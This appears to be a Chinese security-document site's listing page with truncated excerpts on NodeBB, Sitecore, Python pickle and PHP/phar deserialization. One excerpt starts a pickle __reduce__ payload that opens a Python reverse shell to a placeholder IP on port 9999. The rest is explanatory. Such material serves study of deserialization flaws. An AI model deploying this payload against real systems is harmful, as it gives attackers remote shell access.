爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

NodeBB是Design Create Play团队的一套使用Node.js（一套建立在Google V8 JavaScript引擎之上的网络应用平台）构建的论坛系统。

2022-08-28 14:56:49

Sitecore Experience Platform (XP) 简介

Sitecore Experience Platform (XP) 是一个用 .NET 编写的企业内容管理系统 (CMS)，提供了用于内容管理、数字营销以及分析和报告的工具，该 CMS 被企业大量使用，包括许多财富 500 强中的公司。目前，Internet 上有超过 4.5 万个 Sitecore 实例。

2022-08-28 14:49:55

pickle反序列化执行代码反弹 shell

使用__reduce__魔术方法执行import pickleimport osclass A(object): def __reduce__(self): a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999)

2022-08-28 12:42:06

python pvm组成

PVM 由三个部分组成，引擎（或者叫指令分析器），栈区、还有一个 Memo (这个我也不知道怎么解释，我们姑且叫它 “标签区“)1.引擎的作用从头开始读取流中的操作码和参数，并对其进行处理,zai在这个过程中改变栈区和标签区，处理结束后到达栈顶，形成并返回反序列化的对象2.栈区的作用作为流数据处理过程中的暂存区，在不断的进出栈过程中完成对数据流的反序列化，并最终在栈上生成发序列化的结果3.标签区的作用数据的一个索引或者标记如图所示：此处输入图片的描述注意：PVM 指令的书写规范(1)操作码

2022-08-28 12:37:33

python pickle序列化和反序列化的过程

1.序列化过程：(1)从对象提取所有属性,并将属性转化为名值对(2)写入对象的类名(3)写入名值对2.反序列化过程：(1)获取 pickle 输入流(2)重建属性列表(3)根据类名创建一个新的对象(4)将属性复制到新的对象中注意：这个对象只要能在当前环境下创建起来就能完成反序列化，否则则不能实现对象的重构

2022-08-28 12:25:42

python反序列化漏洞

序列化操作import pickleclass Demo():def init(self, name='h3rmesk1t'):self.name = nameprint(pickle.dumps(Demo()))输出：b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Demo\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8

2022-08-28 12:18:50

php反序列化绕过小Trick

php7.1+反序列化对类属性不敏感如果变量前是protected，序列化结果会在变量名前加上\x00*\x00但在特定版本7.1以上则对于类属性不敏感，比如下面的例子即使没有\x00*\x00也依然会输出abc<?php class test{ protected $a; public function __construct(){ $this->a = 'abc'; } public function __de

2022-08-27 12:27:32

php魔术方法调用顺序

来看个示例：<?phpclass Test{public function __construct(){echo 'construct run';}public function __destruct(){echo 'destruct run';}public function __toString(){echo 'toString run';return 'str';}public function __sl

2022-08-27 00:32:35

php常见魔术方法

__construct()：构造函数，此函数会在创建一个类的实例时自动调用。__destruct()：析构函数，此函数会在对象的所有引用都被删除或者类被销毁的时候自动调用。__sleep()：执行serialize()函数之前，会检查类中是否存在_sleep()方法。如果存在，该方法会先被调用。__wakeup()：执行unserialize()函数之前，会检查类中是否存在_wakeup()方法。如果存在，则会先调用_wakeup()方法，预先准备对象需要的资源。__toString()：当一个

2022-08-27 00:26:52

php序列化示例代码

<?phpclass Person { public $name = "Tom"; private $age = 18; protected $sex = "male"; public function hello() { echo "hello"; }}$class = new Person();$class_ser = serialize($class);echo $class_se

2022-08-27 00:18:23

phar反序列化受影响函数

phar反序列化受影响函数

2022-08-26 23:57:50

生成phar文件

注意：要将php.ini中的phar.readonly选项设置为Off，否则无法生成phar文件。<?php class TestObject { } @unlink("phar.phar"); $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?

2022-08-26 23:56:10

跳转到页